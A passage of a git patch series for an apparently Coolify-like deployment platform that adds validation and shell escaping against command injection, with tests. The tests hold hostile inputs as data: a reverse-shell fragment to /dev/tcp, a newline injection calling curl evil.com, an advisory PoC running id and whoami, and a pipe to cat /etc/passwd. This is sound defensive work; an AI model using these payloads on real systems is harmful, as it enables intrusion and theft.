& /dev/tcp/172.23.0.1/1337 0>&1; #'],
+ ['install_command' => $rules['install_command']]
+ );
+
+ expect($validator->fails())->toBeTrue();
+ });
+
+ test('rejects newline injection in start_command', function () {
+ $rules = sharedDataApplications();
+
+ $validator = validator(
+ ['start_command' => "npm start\ncurl evil.com"],
+ ['start_command' => $rules['start_command']]
+ );
+
+ expect($validator->fails())->toBeTrue();
+ });
+
+ test('allows valid install commands', function ($cmd) {
+ $rules = sharedDataApplications();
+
+ $validator = validator(
+ ['install_command' => $cmd],
+ ['install_command' => $rules['install_command']]
+ );
+
+ expect($validator->fails())->toBeFalse();
+ })->with([
+ 'npm install',
+ 'yarn install --frozen-lockfile',
+ 'pip install -r requirements.txt',
+ 'bun install',
+ 'pnpm install --no-frozen-lockfile',
+ ]);
+
+ test('allows valid build commands', function ($cmd) {
+ $rules = sharedDataApplications();
+
+ $validator = validator(
+ ['build_command' => $cmd],
+ ['build_command' => $rules['build_command']]
+ );
+
+ expect($validator->fails())->toBeFalse();
+ })->with([
+ 'npm run build',
+ 'cargo build --release',
+ 'go build -o main .',
+ 'yarn build && yarn postbuild',
+ 'make build',
+ ]);
+
+ test('allows valid start commands', function ($cmd) {
+ $rules = sharedDataApplications();
+
+ $validator = validator(
+ ['start_command' => $cmd],
+ ['start_command' => $rules['start_command']]
+ );
+
+ expect($validator->fails())->toBeFalse();
+ })->with([
+ 'npm start',
+ 'node server.js',
+ 'python main.py',
+ 'java -jar app.jar',
+ './start.sh',
+ ]);
+
+ test('allows null values for command fields', function ($field) {
+ $rules = sharedDataApplications();
+
+ $validator = validator(
+ [$field => null],
+ [$field => $rules[$field]]
+ );
+
+ expect($validator->fails())->toBeFalse();
+ })->with(['install_command', 'build_command', 'start_command']);
+});
+
+describe('install/build/start command rules survive array_merge in controller', function () {
+ test('install_command safe regex is not overridden by local rules', function () {
+ $sharedRules = sharedDataApplications();
+
+ $localRules = [
+ 'name' => 'string|max:255',
+ 'docker_compose_domains' => 'array|nullable',
+ ];
+ $merged = array_merge($sharedRules, $localRules);
+
+ expect($merged['install_command'])->toBeArray();
+ expect($merged['install_command'])->toContain('regex:'.ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN);
+ });
+
+ test('build_command safe regex is not overridden by local rules', function () {
+ $sharedRules = sharedDataApplications();
+
+ $localRules = [
+ 'name' => 'string|max:255',
+ 'docker_compose_domains' => 'array|nullable',
+ ];
+ $merged = array_merge($sharedRules, $localRules);
+
+ expect($merged['build_command'])->toBeArray();
+ expect($merged['build_command'])->toContain('regex:'.ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN);
+ });
+
+ test('start_command safe regex is not overridden by local rules', function () {
+ $sharedRules = sharedDataApplications();
+
+ $localRules = [
+ 'name' => 'string|max:255',
+ 'docker_compose_domains' => 'array|nullable',
+ ];
+ $merged = array_merge($sharedRules, $localRules);
+
+ expect($merged['start_command'])->toBeArray();
+ expect($merged['start_command'])->toContain('regex:'.ValidationPatterns::SHELL_SAFE_COMMAND_PATTERN);
+ });
+});
From 48ba4ece3c1b43cb4b9627438c0ff4e4251e3511 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:28:54 +0100
Subject: [PATCH 096/168] fix: harden GetLogs Livewire component with locked
properties and input validation
Add #[Locked] attributes to security-sensitive properties (resource, servicesubtype,
server, container) to prevent client-side modification via Livewire wire protocol.
Add container name validation using ValidationPatterns::isValidContainerName() and
server ownership authorization via Server::ownedByCurrentTeam() in both getLogs()
and downloadAllLogs() methods.
Co-Authored-By: Claude Opus 4.6
---
app/Livewire/Project/Shared/GetLogs.php | 32 ++++-
tests/Feature/GetLogsCommandInjectionTest.php | 110 ++++++++++++++++++
2 files changed, 137 insertions(+), 5 deletions(-)
create mode 100644 tests/Feature/GetLogsCommandInjectionTest.php
diff --git a/app/Livewire/Project/Shared/GetLogs.php b/app/Livewire/Project/Shared/GetLogs.php
index 22605e1bb..d0121bdc5 100644
--- a/app/Livewire/Project/Shared/GetLogs.php
+++ b/app/Livewire/Project/Shared/GetLogs.php
@@ -16,7 +16,9 @@
use App\Models\StandaloneMysql;
use App\Models\StandalonePostgresql;
use App\Models\StandaloneRedis;
+use App\Support\ValidationPatterns;
use Illuminate\Support\Facades\Process;
+use Livewire\Attributes\Locked;
use Livewire\Component;
class GetLogs extends Component
@@ -29,12 +31,16 @@ class GetLogs extends Component
public string $errors = '';
+ #[Locked]
public Application|Service|StandalonePostgresql|StandaloneRedis|StandaloneMongodb|StandaloneMysql|StandaloneMariadb|StandaloneKeydb|StandaloneDragonfly|StandaloneClickhouse|null $resource = null;
+ #[Locked]
public ServiceApplication|ServiceDatabase|null $servicesubtype = null;
+ #[Locked]
public Server $server;
+ #[Locked]
public ?string $container = null;
public ?string $displayName = null;
@@ -54,7 +60,7 @@ class GetLogs extends Component
public function mount()
{
if (! is_null($this->resource)) {
- if ($this->resource->getMorphClass() === \App\Models\Application::class) {
+ if ($this->resource->getMorphClass() === Application::class) {
$this->showTimeStamps = $this->resource->settings->is_include_timestamps;
} else {
if ($this->servicesubtype) {
@@ -63,7 +69,7 @@ public function mount()
$this->showTimeStamps = $this->resource->is_include_timestamps;
}
}
- if ($this->resource?->getMorphClass() === \App\Models\Application::class) {
+ if ($this->resource?->getMorphClass() === Application::class) {
if (str($this->container)->contains('-pr-')) {
$this->pull_request = 'Pull Request: '.str($this->container)->afterLast('-pr-')->beforeLast('_')->value();
}
@@ -74,11 +80,11 @@ public function mount()
public function instantSave()
{
if (! is_null($this->resource)) {
- if ($this->resource->getMorphClass() === \App\Models\Application::class) {
+ if ($this->resource->getMorphClass() === Application::class) {
$this->resource->settings->is_include_timestamps = $this->showTimeStamps;
$this->resource->settings->save();
}
- if ($this->resource->getMorphClass() === \App\Models\Service::class) {
+ if ($this->resource->getMorphClass() === Service::class) {
$serviceName = str($this->container)->beforeLast('-')->value();
$subType = $this->resource->applications()->where('name', $serviceName)->first();
if ($subType) {
@@ -118,10 +124,20 @@ public function toggleStreamLogs()
public function getLogs($refresh = false)
{
+ if (! Server::ownedByCurrentTeam()->where('id', $this->server->id)->exists()) {
+ $this->outputs = 'Unauthorized.';
+
+ return;
+ }
if (! $this->server->isFunctional()) {
return;
}
- if (! $refresh && ! $this->expandByDefault && ($this->resource?->getMorphClass() === \App\Models\Service::class || str($this->container)->contains('-pr-'))) {
+ if ($this->container && ! ValidationPatterns::isValidContainerName($this->container)) {
+ $this->outputs = 'Invalid container name.';
+
+ return;
+ }
+ if (! $refresh && ! $this->expandByDefault && ($this->resource?->getMorphClass() === Service::class || str($this->container)->contains('-pr-'))) {
return;
}
if ($this->numberOfLines <= 0 || is_null($this->numberOfLines)) {
@@ -194,9 +210,15 @@ public function copyLogs(): string
public function downloadAllLogs(): string
{
+ if (! Server::ownedByCurrentTeam()->where('id', $this->server->id)->exists()) {
+ return '';
+ }
if (! $this->server->isFunctional() || ! $this->container) {
return '';
}
+ if (! ValidationPatterns::isValidContainerName($this->container)) {
+ return '';
+ }
if ($this->showTimeStamps) {
if ($this->server->isSwarm()) {
diff --git a/tests/Feature/GetLogsCommandInjectionTest.php b/tests/Feature/GetLogsCommandInjectionTest.php
new file mode 100644
index 000000000..34824b48b
--- /dev/null
+++ b/tests/Feature/GetLogsCommandInjectionTest.php
@@ -0,0 +1,110 @@
+getAttributes(Locked::class);
+
+ expect($attributes)->not->toBeEmpty();
+ });
+
+ test('server property has Locked attribute', function () {
+ $property = new ReflectionProperty(GetLogs::class, 'server');
+ $attributes = $property->getAttributes(Locked::class);
+
+ expect($attributes)->not->toBeEmpty();
+ });
+
+ test('resource property has Locked attribute', function () {
+ $property = new ReflectionProperty(GetLogs::class, 'resource');
+ $attributes = $property->getAttributes(Locked::class);
+
+ expect($attributes)->not->toBeEmpty();
+ });
+
+ test('servicesubtype property has Locked attribute', function () {
+ $property = new ReflectionProperty(GetLogs::class, 'servicesubtype');
+ $attributes = $property->getAttributes(Locked::class);
+
+ expect($attributes)->not->toBeEmpty();
+ });
+});
+
+describe('GetLogs container name validation in getLogs', function () {
+ test('getLogs method validates container name with ValidationPatterns', function () {
+ $method = new ReflectionMethod(GetLogs::class, 'getLogs');
+ $startLine = $method->getStartLine();
+ $endLine = $method->getEndLine();
+ $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
+ $methodBody = implode('', $lines);
+
+ expect($methodBody)->toContain('ValidationPatterns::isValidContainerName');
+ });
+
+ test('downloadAllLogs method validates container name with ValidationPatterns', function () {
+ $method = new ReflectionMethod(GetLogs::class, 'downloadAllLogs');
+ $startLine = $method->getStartLine();
+ $endLine = $method->getEndLine();
+ $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
+ $methodBody = implode('', $lines);
+
+ expect($methodBody)->toContain('ValidationPatterns::isValidContainerName');
+ });
+});
+
+describe('GetLogs authorization checks', function () {
+ test('getLogs method checks server ownership via ownedByCurrentTeam', function () {
+ $method = new ReflectionMethod(GetLogs::class, 'getLogs');
+ $startLine = $method->getStartLine();
+ $endLine = $method->getEndLine();
+ $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
+ $methodBody = implode('', $lines);
+
+ expect($methodBody)->toContain('Server::ownedByCurrentTeam()');
+ });
+
+ test('downloadAllLogs method checks server ownership via ownedByCurrentTeam', function () {
+ $method = new ReflectionMethod(GetLogs::class, 'downloadAllLogs');
+ $startLine = $method->getStartLine();
+ $endLine = $method->getEndLine();
+ $lines = array_slice(file($method->getFileName()), $startLine - 1, $endLine - $startLine + 1);
+ $methodBody = implode('', $lines);
+
+ expect($methodBody)->toContain('Server::ownedByCurrentTeam()');
+ });
+});
+
+describe('GetLogs container name injection payloads are blocked by validation', function () {
+ test('newline injection payload is rejected', function () {
+ // The exact PoC payload from the advisory
+ $payload = "postgresql 2>/dev/null\necho '===RCE-START==='\nid\nwhoami\nhostname\ncat /etc/hostname\necho '===RCE-END==='\n#";
+ expect(ValidationPatterns::isValidContainerName($payload))->toBeFalse();
+ });
+
+ test('semicolon injection payload is rejected', function () {
+ expect(ValidationPatterns::isValidContainerName('postgresql;id'))->toBeFalse();
+ });
+
+ test('backtick injection payload is rejected', function () {
+ expect(ValidationPatterns::isValidContainerName('postgresql`id`'))->toBeFalse();
+ });
+
+ test('command substitution injection payload is rejected', function () {
+ expect(ValidationPatterns::isValidContainerName('postgresql$(whoami)'))->toBeFalse();
+ });
+
+ test('pipe injection payload is rejected', function () {
+ expect(ValidationPatterns::isValidContainerName('postgresql|cat /etc/passwd'))->toBeFalse();
+ });
+
+ test('valid container names are accepted', function () {
+ expect(ValidationPatterns::isValidContainerName('postgresql'))->toBeTrue();
+ expect(ValidationPatterns::isValidContainerName('my-app-container'))->toBeTrue();
+ expect(ValidationPatterns::isValidContainerName('service_db.v2'))->toBeTrue();
+ expect(ValidationPatterns::isValidContainerName('coolify-proxy'))->toBeTrue();
+ });
+});
From 3d1b9f53a0aec74468be75675bcaaaed0fd41d46 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 12:28:59 +0100
Subject: [PATCH 097/168] fix: add validation and escaping for Docker network
names
Add strict validation for Docker network names using a regex pattern
that matches Docker's naming rules (alphanumeric start, followed by
alphanumeric, dots, hyphens, underscores).
Changes:
- Add DOCKER_NETWORK_PATTERN to ValidationPatterns with helper methods
- Validate network field in Destination creation and update Livewire components
- Add setNetworkAttribute mutator on StandaloneDocker and SwarmDocker models
- Apply escapeshellarg() to all network field usages in shell commands across
ApplicationDeploymentJob, DatabaseBackupJob, StartService, Init command,
proxy helpers, and Destination/Show
- Add comprehensive tests for pattern validation and model mutator
Co-Authored-By: Claude Opus 4.6
---
app/Actions/Service/StartService.php | 4 +-
app/Console/Commands/Init.php | 11 ++---
app/Jobs/ApplicationDeploymentJob.php | 22 ++++++----
app/Jobs/DatabaseBackupJob.php | 7 ++--
app/Livewire/Destination/New/Docker.php | 3 +-
app/Livewire/Destination/Show.php | 7 ++--
app/Models/StandaloneDocker.php | 13 +++++-
app/Models/SwarmDocker.php | 11 +++++
app/Support/ValidationPatterns.php | 45 ++++++++++++++++++++
bootstrap/helpers/proxy.php | 24 ++++++-----
tests/Unit/DockerNetworkInjectionTest.php | 48 ++++++++++++++++++++++
tests/Unit/ValidationPatternsTest.php | 50 +++++++++++++++++++++++
12 files changed, 211 insertions(+), 34 deletions(-)
create mode 100644 tests/Unit/DockerNetworkInjectionTest.php
diff --git a/app/Actions/Service/StartService.php b/app/Actions/Service/StartService.php
index 6b5e1d4ac..17948d93b 100644
--- a/app/Actions/Service/StartService.php
+++ b/app/Actions/Service/StartService.php
@@ -40,10 +40,10 @@ public function handle(Service $service, bool $pullLatestImages = false, bool $s
$commands[] = "docker network connect $service->uuid coolify-proxy >/dev/null 2>&1 || true";
if (data_get($service, 'connect_to_docker_network')) {
$compose = data_get($service, 'docker_compose', []);
- $network = $service->destination->network;
+ $safeNetwork = escapeshellarg($service->destination->network);
$serviceNames = data_get(Yaml::parse($compose), 'services', []);
foreach ($serviceNames as $serviceName => $serviceConfig) {
- $commands[] = "docker network connect --alias {$serviceName}-{$service->uuid} $network {$serviceName}-{$service->uuid} >/dev/null 2>&1 || true";
+ $commands[] = "docker network connect --alias {$serviceName}-{$service->uuid} {$safeNetwork} {$serviceName}-{$service->uuid} >/dev/null 2>&1 || true";
}
}
diff --git a/app/Console/Commands/Init.php b/app/Console/Commands/Init.php
index 66cb77838..e95c29f72 100644
--- a/app/Console/Commands/Init.php
+++ b/app/Console/Commands/Init.php
@@ -212,18 +212,19 @@ private function cleanupUnusedNetworkFromCoolifyProxy()
$removeNetworks = $allNetworks->diff($networks);
$commands = collect();
foreach ($removeNetworks as $network) {
- $out = instant_remote_process(["docker network inspect -f json $network | jq '.[].Containers | if . == {} then null else . end'"], $server, false);
+ $safe = escapeshellarg($network);
+ $out = instant_remote_process(["docker network inspect -f json {$safe} | jq '.[].Containers | if . == {} then null else . end'"], $server, false);
if (empty($out)) {
- $commands->push("docker network disconnect $network coolify-proxy >/dev/null 2>&1 || true");
- $commands->push("docker network rm $network >/dev/null 2>&1 || true");
+ $commands->push("docker network disconnect {$safe} coolify-proxy >/dev/null 2>&1 || true");
+ $commands->push("docker network rm {$safe} >/dev/null 2>&1 || true");
} else {
$data = collect(json_decode($out, true));
if ($data->count() === 1) {
// If only coolify-proxy itself is connected to that network (it should not be possible, but who knows)
$isCoolifyProxyItself = data_get($data->first(), 'Name') === 'coolify-proxy';
if ($isCoolifyProxyItself) {
- $commands->push("docker network disconnect $network coolify-proxy >/dev/null 2>&1 || true");
- $commands->push("docker network rm $network >/dev/null 2>&1 || true");
+ $commands->push("docker network disconnect {$safe} coolify-proxy >/dev/null 2>&1 || true");
+ $commands->push("docker network rm {$safe} >/dev/null 2>&1 || true");
}
}
}
diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 785e8c8e3..dc8bc4374 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -288,7 +288,8 @@ public function handle(): void
// Make sure the private key is stored in the filesystem
$this->server->privateKey->storeInFileSystem();
// Generate custom host<->ip mapping
- $allContainers = instant_remote_process(["docker network inspect {$this->destination->network} -f '{{json .Containers}}' "], $this->server);
+ $safeNetwork = escapeshellarg($this->destination->network);
+ $allContainers = instant_remote_process(["docker network inspect {$safeNetwork} -f '{{json .Containers}}' "], $this->server);
if (! is_null($allContainers)) {
$allContainers = format_docker_command_output_to_json($allContainers);
@@ -2015,9 +2016,11 @@ private function prepare_builder_image(bool $firstTry = true)
$runCommand = "docker run -d --name {$this->deployment_uuid} {$env_flags} --rm -v {$this->serverUserHomeDir}/.docker/config.json:/root/.docker/config.json:ro -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
} else {
if ($this->dockerConfigFileExists === 'OK') {
- $runCommand = "docker run -d --network {$this->destination->network} --name {$this->deployment_uuid} {$env_flags} --rm -v {$this->serverUserHomeDir}/.docker/config.json:/root/.docker/config.json:ro -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
+ $safeNetwork = escapeshellarg($this->destination->network);
+ $runCommand = "docker run -d --network {$safeNetwork} --name {$this->deployment_uuid} {$env_flags} --rm -v {$this->serverUserHomeDir}/.docker/config.json:/root/.docker/config.json:ro -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
} else {
- $runCommand = "docker run -d --network {$this->destination->network} --name {$this->deployment_uuid} {$env_flags} --rm -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
+ $safeNetwork = escapeshellarg($this->destination->network);
+ $runCommand = "docker run -d --network {$safeNetwork} --name {$this->deployment_uuid} {$env_flags} --rm -v /var/run/docker.sock:/var/run/docker.sock {$helperImage}";
}
}
if ($firstTry) {
@@ -3046,28 +3049,29 @@ private function build_image()
$this->execute_remote_command([executeInDocker($this->deployment_uuid, 'rm '.self::NIXPACKS_PLAN_PATH), 'hidden' => true]);
} else {
// Dockerfile buildpack
+ $safeNetwork = escapeshellarg($this->destination->network);
if ($this->dockerSecretsSupported) {
// Modify the Dockerfile to use build secrets
$this->modify_dockerfile_for_secrets("{$this->workdir}{$this->dockerfile_location}");
$secrets_flags = $this->build_secrets ? " {$this->build_secrets}" : '';
if ($this->force_rebuild) {
- $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build --no-cache {$this->buildTarget} --network {$this->destination->network} -f {$this->workdir}{$this->dockerfile_location}{$secrets_flags} --progress plain -t $this->build_image_name {$this->workdir}");
+ $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build --no-cache {$this->buildTarget} --network {$safeNetwork} -f {$this->workdir}{$this->dockerfile_location}{$secrets_flags} --progress plain -t $this->build_image_name {$this->workdir}");
} else {
- $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build {$this->buildTarget} --network {$this->destination->network} -f {$this->workdir}{$this->dockerfile_location}{$secrets_flags} --progress plain -t $this->build_image_name {$this->workdir}");
+ $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build {$this->buildTarget} --network {$safeNetwork} -f {$this->workdir}{$this->dockerfile_location}{$secrets_flags} --progress plain -t $this->build_image_name {$this->workdir}");
}
} elseif ($this->dockerBuildkitSupported) {
// BuildKit without secrets
if ($this->force_rebuild) {
- $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build --no-cache {$this->buildTarget} --network {$this->destination->network} -f {$this->workdir}{$this->dockerfile_location} --progress plain -t $this->build_image_name {$this->build_args} {$this->workdir}");
+ $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build --no-cache {$this->buildTarget} --network {$safeNetwork} -f {$this->workdir}{$this->dockerfile_location} --progress plain -t $this->build_image_name {$this->build_args} {$this->workdir}");
} else {
- $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build {$this->buildTarget} --network {$this->destination->network} -f {$this->workdir}{$this->dockerfile_location} --progress plain -t $this->build_image_name {$this->build_args} {$this->workdir}");
+ $build_command = $this->wrap_build_command_with_env_export("DOCKER_BUILDKIT=1 docker build {$this->buildTarget} --network {$safeNetwork} -f {$this->workdir}{$this->dockerfile_location} --progress plain -t $this->build_image_name {$this->build_args} {$this->workdir}");
}
} else {
// Traditional build with args
if ($this->force_rebuild) {
- $build_command = $this->wrap_build_command_with_env_export("docker build --no-cache {$this->buildTarget} --network {$this->destination->network} -f {$this->workdir}{$this->dockerfile_location} {$this->build_args} -t $this->build_image_name {$this->workdir}");
+ $build_command = $this->wrap_build_command_with_env_export("docker build --no-cache {$this->buildTarget} --network {$safeNetwork} -f {$this->workdir}{$this->dockerfile_location} {$this->build_args} -t $this->build_image_name {$this->workdir}");
} else {
- $build_command = $this->wrap_build_command_with_env_export("docker build {$this->buildTarget} --network {$this->destination->network} -f {$this->workdir}{$this->dockerfile_location} {$this->build_args} -t $this->build_image_name {$this->workdir}");
+ $build_command = $this->wrap_build_command_with_env_export("docker build {$this->buildTarget} --network {$safeNetwork} -f {$this->workdir}{$this->dockerfile_location} {$this->build_args} -t $this->build_image_name {$this->workdir}");
}
}
$base64_build_command = base64_encode($build_command);
diff --git a/app/Jobs/DatabaseBackupJob.php b/app/Jobs/DatabaseBackupJob.php
index 7f1feaa21..a2d08e1e8 100644
--- a/app/Jobs/DatabaseBackupJob.php
+++ b/app/Jobs/DatabaseBackupJob.php
@@ -678,6 +678,7 @@ private function upload_to_s3(): void
} else {
$network = $this->database->destination->network;
}
+ $safeNetwork = escapeshellarg($network);
$fullImageName = $this->getFullImageName();
@@ -689,13 +690,13 @@ private function upload_to_s3(): void
if (isDev()) {
if ($this->database->name === 'coolify-db') {
$backup_location_from = '/var/lib/docker/volumes/coolify_dev_backups_data/_data/coolify/coolify-db-'.$this->server->ip.$this->backup_file;
- $commands[] = "docker run -d --network {$network} --name backup-of-{$this->backup_log_uuid} --rm -v $backup_location_from:$this->backup_location:ro {$fullImageName}";
+ $commands[] = "docker run -d --network {$safeNetwork} --name backup-of-{$this->backup_log_uuid} --rm -v $backup_location_from:$this->backup_location:ro {$fullImageName}";
} else {
$backup_location_from = '/var/lib/docker/volumes/coolify_dev_backups_data/_data/databases/'.str($this->team->name)->slug().'-'.$this->team->id.'/'.$this->directory_name.$this->backup_file;
- $commands[] = "docker run -d --network {$network} --name backup-of-{$this->backup_log_uuid} --rm -v $backup_location_from:$this->backup_location:ro {$fullImageName}";
+ $commands[] = "docker run -d --network {$safeNetwork} --name backup-of-{$this->backup_log_uuid} --rm -v $backup_location_from:$this->backup_location:ro {$fullImageName}";
}
} else {
- $commands[] = "docker run -d --network {$network} --name backup-of-{$this->backup_log_uuid} --rm -v $this->backup_location:$this->backup_location:ro {$fullImageName}";
+ $commands[] = "docker run -d --network {$safeNetwork} --name backup-of-{$this->backup_log_uuid} --rm -v $this->backup_location:$this->backup_location:ro {$fullImageName}";
}
// Escape S3 credentials to prevent command injection
diff --git a/app/Livewire/Destination/New/Docker.php b/app/Livewire/Destination/New/Docker.php
index 70751fa03..5c1b178d7 100644
--- a/app/Livewire/Destination/New/Docker.php
+++ b/app/Livewire/Destination/New/Docker.php
@@ -5,6 +5,7 @@
use App\Models\Server;
use App\Models\StandaloneDocker;
use App\Models\SwarmDocker;
+use App\Support\ValidationPatterns;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use Livewire\Attributes\Locked;
use Livewire\Attributes\Validate;
@@ -24,7 +25,7 @@ class Docker extends Component
#[Validate(['required', 'string'])]
public string $name;
- #[Validate(['required', 'string'])]
+ #[Validate(['required', 'string', 'max:255', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._-]*$/'])]
public string $network;
#[Validate(['required', 'string'])]
diff --git a/app/Livewire/Destination/Show.php b/app/Livewire/Destination/Show.php
index 98cf72376..f2cdad074 100644
--- a/app/Livewire/Destination/Show.php
+++ b/app/Livewire/Destination/Show.php
@@ -20,7 +20,7 @@ class Show extends Component
#[Validate(['string', 'required'])]
public string $name;
- #[Validate(['string', 'required'])]
+ #[Validate(['string', 'required', 'max:255', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._-]*$/'])]
public string $network;
#[Validate(['string', 'required'])]
@@ -84,8 +84,9 @@ public function delete()
if ($this->destination->attachedTo()) {
return $this->dispatch('error', 'You must delete all resources before deleting this destination.');
}
- instant_remote_process(["docker network disconnect {$this->destination->network} coolify-proxy"], $this->destination->server, throwError: false);
- instant_remote_process(['docker network rm -f '.$this->destination->network], $this->destination->server);
+ $safeNetwork = escapeshellarg($this->destination->network);
+ instant_remote_process(["docker network disconnect {$safeNetwork} coolify-proxy"], $this->destination->server, throwError: false);
+ instant_remote_process(["docker network rm -f {$safeNetwork}"], $this->destination->server);
}
$this->destination->delete();
diff --git a/app/Models/StandaloneDocker.php b/app/Models/StandaloneDocker.php
index 0407c2255..abd6e168f 100644
--- a/app/Models/StandaloneDocker.php
+++ b/app/Models/StandaloneDocker.php
@@ -3,6 +3,7 @@
namespace App\Models;
use App\Jobs\ConnectProxyToNetworksJob;
+use App\Support\ValidationPatterns;
use App\Traits\HasSafeStringAttribute;
use Illuminate\Database\Eloquent\Factories\HasFactory;
@@ -18,13 +19,23 @@ protected static function boot()
parent::boot();
static::created(function ($newStandaloneDocker) {
$server = $newStandaloneDocker->server;
+ $safeNetwork = escapeshellarg($newStandaloneDocker->network);
instant_remote_process([
- "docker network inspect $newStandaloneDocker->network >/dev/null 2>&1 || docker network create --driver overlay --attachable $newStandaloneDocker->network >/dev/null",
+ "docker network inspect {$safeNetwork} >/dev/null 2>&1 || docker network create --driver overlay --attachable {$safeNetwork} >/dev/null",
], $server, false);
ConnectProxyToNetworksJob::dispatchSync($server);
});
}
+ public function setNetworkAttribute(string $value): void
+ {
+ if (! ValidationPatterns::isValidDockerNetwork($value)) {
+ throw new \InvalidArgumentException('Invalid Docker network name. Must start with alphanumeric and contain only alphanumeric characters, dots, hyphens, and underscores.');
+ }
+
+ $this->attributes['network'] = $value;
+ }
+
public function applications()
{
return $this->morphMany(Application::class, 'destination');
diff --git a/app/Models/SwarmDocker.php b/app/Models/SwarmDocker.php
index 08be81970..3144432c5 100644
--- a/app/Models/SwarmDocker.php
+++ b/app/Models/SwarmDocker.php
@@ -2,10 +2,21 @@
namespace App\Models;
+use App\Support\ValidationPatterns;
+
class SwarmDocker extends BaseModel
{
protected $guarded = [];
+ public function setNetworkAttribute(string $value): void
+ {
+ if (! ValidationPatterns::isValidDockerNetwork($value)) {
+ throw new \InvalidArgumentException('Invalid Docker network name. Must start with alphanumeric and contain only alphanumeric characters, dots, hyphens, and underscores.');
+ }
+
+ $this->attributes['network'] = $value;
+ }
+
public function applications()
{
return $this->morphMany(Application::class, 'destination');
diff --git a/app/Support/ValidationPatterns.php b/app/Support/ValidationPatterns.php
index 7084b4cc2..cec607f4e 100644
--- a/app/Support/ValidationPatterns.php
+++ b/app/Support/ValidationPatterns.php
@@ -58,6 +58,13 @@ class ValidationPatterns
*/
public const CONTAINER_NAME_PATTERN = '/^[a-zA-Z0-9][a-zA-Z0-9._-]*$/';
+ /**
+ * Pattern for Docker network names
+ * Must start with alphanumeric, followed by alphanumeric, dots, hyphens, or underscores
+ * Matches Docker's network naming rules and prevents shell injection
+ */
+ public const DOCKER_NETWORK_PATTERN = '/^[a-zA-Z0-9][a-zA-Z0-9._-]*$/';
+
/**
* Get validation rules for name fields
*/
@@ -210,6 +217,44 @@ public static function isValidContainerName(string $name): bool
return preg_match(self::CONTAINER_NAME_PATTERN, $name) === 1;
}
+ /**
+ * Get validation rules for Docker network name fields
+ */
+ public static function dockerNetworkRules(bool $required = true, int $maxLength = 255): array
+ {
+ $rules = [];
+
+ if ($required) {
+ $rules[] = 'required';
+ } else {
+ $rules[] = 'nullable';
+ }
+
+ $rules[] = 'string';
+ $rules[] = "max:$maxLength";
+ $rules[] = 'regex:'.self::DOCKER_NETWORK_PATTERN;
+
+ return $rules;
+ }
+
+ /**
+ * Get validation messages for Docker network name fields
+ */
+ public static function dockerNetworkMessages(string $field = 'network'): array
+ {
+ return [
+ "{$field}.regex" => 'The network name must start with an alphanumeric character and contain only alphanumeric characters, dots, hyphens, and underscores.',
+ ];
+ }
+
+ /**
+ * Check if a string is a valid Docker network name.
+ */
+ public static function isValidDockerNetwork(string $name): bool
+ {
+ return preg_match(self::DOCKER_NETWORK_PATTERN, $name) === 1;
+ }
+
/**
* Get combined validation messages for both name and description fields
*/
diff --git a/bootstrap/helpers/proxy.php b/bootstrap/helpers/proxy.php
index cf9f648bb..ed18dfe76 100644
--- a/bootstrap/helpers/proxy.php
+++ b/bootstrap/helpers/proxy.php
@@ -109,18 +109,20 @@ function connectProxyToNetworks(Server $server)
['networks' => $networks] = collectDockerNetworksByServer($server);
if ($server->isSwarm()) {
$commands = $networks->map(function ($network) {
+ $safe = escapeshellarg($network);
return [
- "docker network ls --format '{{.Name}}' | grep '^$network$' >/dev/null || docker network create --driver overlay --attachable $network >/dev/null",
- "docker network connect $network coolify-proxy >/dev/null 2>&1 || true",
- "echo 'Successfully connected coolify-proxy to $network network.'",
+ "docker network ls --format '{{.Name}}' | grep '^{$network}$' >/dev/null || docker network create --driver overlay --attachable {$safe} >/dev/null",
+ "docker network connect {$safe} coolify-proxy >/dev/null 2>&1 || true",
+ "echo 'Successfully connected coolify-proxy to {$safe} network.'",
];
});
} else {
$commands = $networks->map(function ($network) {
+ $safe = escapeshellarg($network);
return [
- "docker network ls --format '{{.Name}}' | grep '^$network$' >/dev/null || docker network create --attachable $network >/dev/null",
- "docker network connect $network coolify-proxy >/dev/null 2>&1 || true",
- "echo 'Successfully connected coolify-proxy to $network network.'",
+ "docker network ls --format '{{.Name}}' | grep '^{$network}$' >/dev/null || docker network create --attachable {$safe} >/dev/null",
+ "docker network connect {$safe} coolify-proxy >/dev/null 2>&1 || true",
+ "echo 'Successfully connected coolify-proxy to {$safe} network.'",
];
});
}
@@ -141,16 +143,18 @@ function ensureProxyNetworksExist(Server $server)
if ($server->isSwarm()) {
$commands = $networks->map(function ($network) {
+ $safe = escapeshellarg($network);
return [
- "echo 'Ensuring network $network exists...'",
- "docker network ls --format '{{.Name}}' | grep -q '^{$network}$' || docker network create --driver overlay --attachable $network",
+ "echo 'Ensuring network {$safe} exists...'",
+ "docker network ls --format '{{.Name}}' | grep -q '^{$network}$' || docker network create --driver overlay --attachable {$safe}",
];
});
} else {
$commands = $networks->map(function ($network) {
